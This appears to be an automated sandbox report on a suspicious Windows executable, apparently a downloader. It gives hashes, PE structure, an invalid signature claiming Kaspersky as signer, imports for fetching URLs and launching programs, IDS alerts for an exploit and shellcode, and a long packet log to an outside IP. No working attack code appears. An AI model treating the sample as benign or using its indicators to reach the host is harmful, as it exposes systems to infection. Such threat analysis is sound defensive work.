                                                                            SSDEEP:6144:eIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNSdwBCswSbw:zXD94+WlLZMM6YFHM+w
                                                                            MD5:FC5B26AEB54FE0AE0FF4C595C2491F14
                                                                            SHA1:60432BE62D277C404DB5450EDB0F30743A66A491
                                                                            SHA-256:05CE2000E19950DECD5A899158D43751C90A860A86423F81A9409E0DAFC166EC
                                                                            SHA-512:D88E3F3B17E0560172E765F6A84D8F4EA1B1C4121EC5D92D033ECC65231A74533E908CEF12554454D271D52106F7AAEEBF7E1F56E4A33658E2FEE28A6D17A1B2
                                                                            Malicious:false
                                                                            Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.o0................................................................................................................................................................................................................................................................................................................................................./+&.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                            Entropy (8bit):6.606058719040755
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                            File name:LisectAVT_2403002B_246.exe
                                                                            File size:344'224 bytes
                                                                            MD5:8b5eb95f4a065ebf2719fe29321ca7ff
                                                                            SHA1:7eca9aca802512fe345f55bb5aa969f384f3e934
                                                                            SHA256:3754d6f495a00c1b11dc4da5a975d3876303071f3238307e4225e0ce392c02c5
                                                                            SHA512:ae1acc254b4bc880f02f407f1a18c7566ab08e42e525ba214d758d49b11e4e93f69a1880c4dc8dc09e9dabe6aa79c70fe640873b7d165f1c17b9e59968c250a3
                                                                            SSDEEP:6144:B582blhfS3Cyp7Slb8/njrtolAOrNhkEMKBytnf:382TfS3Oqql+EMKByhf
                                                                            TLSH:3E749E00B5808433D8B3193208F99B795A3EBD600F1599DB73D87B7E8F746D1AA3166B
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........~.............................................................................t.......t...............t.......Rich...........
                                                                            Icon Hash:78d8ac7c1ec6fc78
                                                                            Entrypoint:0x409efa
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:true
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows cui
                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x65FA7479 [Wed Mar 20 05:30:33 2024 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:6
                                                                            OS Version Minor:0
                                                                            File Version Major:6
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:6
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:420798ab814743e3a29327a2a50ae1f1
                                                                            Signature Valid:false
                                                                            Signature Issuer:CN=DigiCert Assured ID Code Signing CA-1, OU=www.digicert.com, O=DigiCert Inc, C=US
                                                                            Signature Validation Error:The digital signature of the object did not verify
                                                                            Error Number:-2146869232
                                                                            Not Before, Not After
                                                                            • 09/06/2020 01:00:00 14/06/2023 13:00:00
                                                                            Subject Chain
                                                                            • CN=AO Kaspersky Lab, O=AO Kaspersky Lab, L=Moscow, C=RU
                                                                            Version:3
                                                                            Thumbprint MD5:771BAFE44ED364A093759572C5926BC0
                                                                            Thumbprint SHA-1:514827B465A83ECF22BAFCAC6A8F84C2EC5E561F
                                                                            Thumbprint SHA-256:96DE6F242505DE176BF6C750CC61E0B3E1795A8ABF10BF5E88C66F750A39913F
                                                                            Serial:067CE8A9F2E02AC7D49304F85E9474E1
                                                                            Instruction
                                                                            call 00007F2D6D3033AAh
                                                                            jmp 00007F2D6D302DC9h
                                                                            push ebp
                                                                            mov ebp, esp
                                                                            mov eax, dword ptr [ebp+08h]
                                                                            push esi
                                                                            mov ecx, dword ptr [eax+3Ch]
                                                                            add ecx, eax
                                                                            movzx eax, word ptr [ecx+14h]
                                                                            lea edx, dword ptr [ecx+18h]
                                                                            add edx, eax
                                                                            movzx eax, word ptr [ecx+06h]
                                                                            imul esi, eax, 28h
                                                                            add esi, edx
                                                                            cmp edx, esi
                                                                            je 00007F2D6D302F6Bh
                                                                            mov ecx, dword ptr [ebp+0Ch]
                                                                            cmp ecx, dword ptr [edx+0Ch]
                                                                            jc 00007F2D6D302F5Ch
                                                                            mov eax, dword ptr [edx+08h]
                                                                            add eax, dword ptr [edx+0Ch]
                                                                            cmp ecx, eax
                                                                            jc 00007F2D6D302F5Eh
                                                                            add edx, 28h
                                                                            cmp edx, esi
                                                                            jne 00007F2D6D302F3Ch
                                                                            xor eax, eax
                                                                            pop esi
                                                                            pop ebp
                                                                            ret
                                                                            mov eax, edx
                                                                            jmp 00007F2D6D302F4Bh
                                                                            push esi
                                                                            call 00007F2D6D30385Dh
                                                                            test eax, eax
                                                                            je 00007F2D6D302F72h
                                                                            mov eax, dword ptr fs:[00000018h]
                                                                            mov esi, 00438230h
                                                                            mov edx, dword ptr [eax+04h]
                                                                            jmp 00007F2D6D302F56h
                                                                            cmp edx, eax
                                                                            je 00007F2D6D302F62h
                                                                            xor eax, eax
                                                                            mov ecx, edx
                                                                            lock cmpxchg dword ptr [esi], ecx
                                                                            test eax, eax
                                                                            jne 00007F2D6D302F42h
                                                                            xor al, al
                                                                            pop esi
                                                                            ret
                                                                            mov al, 01h
                                                                            pop esi
                                                                            ret
                                                                            push ebp
                                                                            mov ebp, esp
                                                                            cmp dword ptr [ebp+08h], 00000000h
                                                                            jne 00007F2D6D302F59h
                                                                            mov byte ptr [00438234h], 00000001h
                                                                            call 00007F2D6D30364Bh
                                                                            call 00007F2D6D30586Fh
                                                                            test al, al
                                                                            jne 00007F2D6D302F56h
                                                                            xor al, al
                                                                            pop ebp
                                                                            ret
                                                                            call 00007F2D6D30E3C6h
                                                                            test al, al
                                                                            jne 00007F2D6D302F5Ch
                                                                            push 00000000h
                                                                            call 00007F2D6D305876h
                                                                            pop ecx
                                                                            jmp 00007F2D6D302F3Bh
                                                                            mov al, 01h
                                                                            pop ebp
                                                                            ret
                                                                            push ebp
                                                                            mov ebp, esp
                                                                            cmp byte ptr [00438235h], 00000000h
                                                                            je 00007F2D6D302F56h
                                                                            mov al, 01h
                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x35e200x64.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x390000x151d0.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x4d4000x6ca0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x4f0000x1d20.reloc
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x33a040x38.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x33a400x40.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x280000x17c.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            .text0x10000x267580x26800d6a1d92cbf1e0c6c1fffb2d4be06fd94False0.5531846083603896data6.556357890001363IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                            .rdata0x280000xe6bc0xe800b2d4ee7fa662580330b5a255d7b4d580False0.5104391163793104data5.5427476886139IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .data0x370000x1d6c0x10002f8b31a80610d16b5baedfce4072667fFalse0.195068359375DOS executable (block device driver)3.1613628408255594IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .rsrc0x390000x151d00x152004cadef8f465240978a23aa4f940feb1fFalse0.5139492418639053data5.955658626219142IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .reloc0x4f0000x1d200x1e000840c4870df505269b78eec799efe991False0.7354166666666667data6.451435730887686IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                            EXE0x391a00x10800PE32 executable (GUI) Intel 80386, for MS WindowsChineseChina0.5619229403409091
                                                                            RT_ICON0x499a00x528Device independent bitmap graphic, 16 x 32 x 32, image size 1280ChineseChina0.5227272727272727
                                                                            RT_ICON0x49ec80x1428Device independent bitmap graphic, 32 x 64 x 32, image size 5120ChineseChina0.4007751937984496
                                                                            RT_ICON0x4b2f00x2d28Device independent bitmap graphic, 48 x 96 x 32, image size 11520ChineseChina0.30960207612456747
                                                                            RT_GROUP_ICON0x4e0180x30dataChineseChina0.8125
                                                                            RT_MANIFEST0x4e0480x188XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5892857142857143
                                                                            DLLImport
                                                                            KERNEL32.dllSetPriorityClass, VirtualFree, GetCurrentProcess, VirtualAlloc, SetThreadPriority, Sleep, GetCurrentThread, ExitProcess, GetConsoleWindow, CreateDirectoryA, WriteConsoleW, HeapSize, CreateFileW, GetProcessHeap, SetStdHandle, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetOEMCP, GetACP, IsValidCodePage, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, MultiByteToWideChar, WideCharToMultiByte, LCMapStringEx, GetStringTypeW, GetCPInfo, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetModuleHandleW, TerminateProcess, RtlUnwind, RaiseException, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetCommandLineA, GetCommandLineW, GetStdHandle, WriteFile, GetModuleFileNameW, GetModuleHandleExW, GetFileSizeEx, SetFilePointerEx, GetFileType, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, HeapFree, CloseHandle, HeapAlloc, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, ReadFile, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, SetEndOfFile
                                                                            USER32.dllShowWindow
                                                                            SHELL32.dllSHChangeNotify, ShellExecuteA
                                                                            WININET.dllInternetCloseHandle, InternetOpenA, InternetReadFile, InternetOpenUrlA
                                                                            Language of compilation systemCountry where language is spokenMap
                                                                            ChineseChina
                                                                            EnglishUnited States
                                                                            TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                                                            2024-07-25T16:04:45.684505+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434973720.114.59.183192.168.2.4
                                                                            2024-07-25T16:04:34.377932+0200TCP2011803ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected4434973343.153.232.151192.168.2.4
                                                                            2024-07-25T16:05:24.036708+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434975120.114.59.183192.168.2.4
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Jul 25, 2024 16:04:25.662312031 CEST49731443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:25.662405014 CEST4434973143.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:25.662481070 CEST49731443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:25.674767017 CEST49731443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:25.674808979 CEST4434973143.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:27.066837072 CEST4434973143.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:27.067012072 CEST49731443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:27.067965031 CEST4434973143.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:27.068043947 CEST49731443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:27.187007904 CEST49731443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:27.187052965 CEST4434973143.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:27.187390089 CEST4434973143.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:27.187452078 CEST49731443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:27.191566944 CEST49731443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:27.232506037 CEST4434973143.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:27.748414040 CEST4434973143.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:27.748440981 CEST4434973143.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:27.748667002 CEST49731443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:27.748713970 CEST4434973143.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:27.748759985 CEST49731443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:27.754385948 CEST4434973143.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:27.754497051 CEST49731443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:27.754527092 CEST4434973143.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:27.754565001 CEST49731443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:27.825040102 CEST4434973143.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:27.825135946 CEST4434973143.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:27.825175047 CEST49731443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:27.825345039 CEST49731443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:27.826272011 CEST49731443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:27.826302052 CEST4434973143.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:27.826318979 CEST49731443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:27.826354980 CEST49731443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:27.863008022 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:27.863044024 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:27.863110065 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:27.863382101 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:27.863390923 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:30.293867111 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:30.294111967 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:30.294881105 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:30.294904947 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:30.295104980 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:30.295110941 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:30.693865061 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:30.693893909 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:30.693988085 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:30.693988085 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:30.694006920 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:30.694134951 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:30.784308910 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:30.784342051 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:30.784521103 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:30.784539938 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:30.784583092 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:30.786803961 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:30.786912918 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:30.786921024 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:30.787087917 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:30.788852930 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:30.788924932 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:30.788932085 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:30.788975000 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:30.791373968 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:30.791441917 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:30.791448116 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:30.791659117 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:30.794011116 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:30.794078112 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:30.794094086 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:30.794136047 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:30.880669117 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:30.881314039 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:30.881340027 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:30.881438017 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:30.902029037 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:30.902051926 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:30.902240992 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:30.902261972 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:30.902335882 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:30.908512115 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:30.908530951 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:30.908612013 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:30.908642054 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:30.908828974 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:30.914551973 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:30.914572001 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:30.914741039 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:30.914758921 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:30.915172100 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:31.002741098 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.002767086 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.002926111 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:31.002947092 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.003062010 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:31.010837078 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.010859013 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.011003971 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:31.011030912 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.011075974 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:31.021532059 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.021552086 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.021684885 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:31.021708965 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.021750927 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:31.038341999 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.038368940 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.038445950 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:31.038461924 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.038501024 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:31.044538021 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.044563055 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.044631004 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:31.044646025 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.044687033 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:31.053754091 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.053778887 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.053842068 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:31.053857088 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.054105997 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:31.057238102 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.057296991 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:31.057307005 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.057410002 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:31.060714006 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.060808897 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:31.060817003 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.061078072 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:31.066504002 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.066513062 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.066576004 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:31.066590071 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.066628933 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:31.066628933 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:31.087593079 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.087618113 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.087702990 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:31.087730885 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.088166952 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:31.093432903 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.093456984 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.093538046 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:31.093554020 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.093617916 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:31.100231886 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.100277901 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.100389957 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:31.100389957 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:31.100409031 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.100682020 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:31.101366997 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.101444006 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:31.101464987 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.101538897 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:31.103503942 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.103585958 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:31.103594065 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.103662014 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:31.107757092 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.107784033 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.107850075 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:31.107863903 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.107965946 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:31.112078905 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.112127066 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.112174034 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:31.112195969 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.112231970 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:31.112231970 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:31.115511894 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.115551949 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.115619898 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:31.115619898 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:31.115633011 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.115967989 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:31.121350050 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.121396065 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.121433973 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:31.121433973 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:31.121450901 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.121505022 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:31.121505022 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:31.122809887 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.122915983 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:31.122926950 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.123028994 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:31.234709024 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.234863043 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:31.234913111 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.235168934 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:31.239403963 CEST4434973243.153.232.151192.168.2.4
                                                                            Jul 25, 2024 16:04:31.239516020 CEST49732443192.168.2.443.153.232.151
                                                                            Jul 25, 2024 16:04:31.239546061 CEST4434973243.153.232.151192.168.2.4
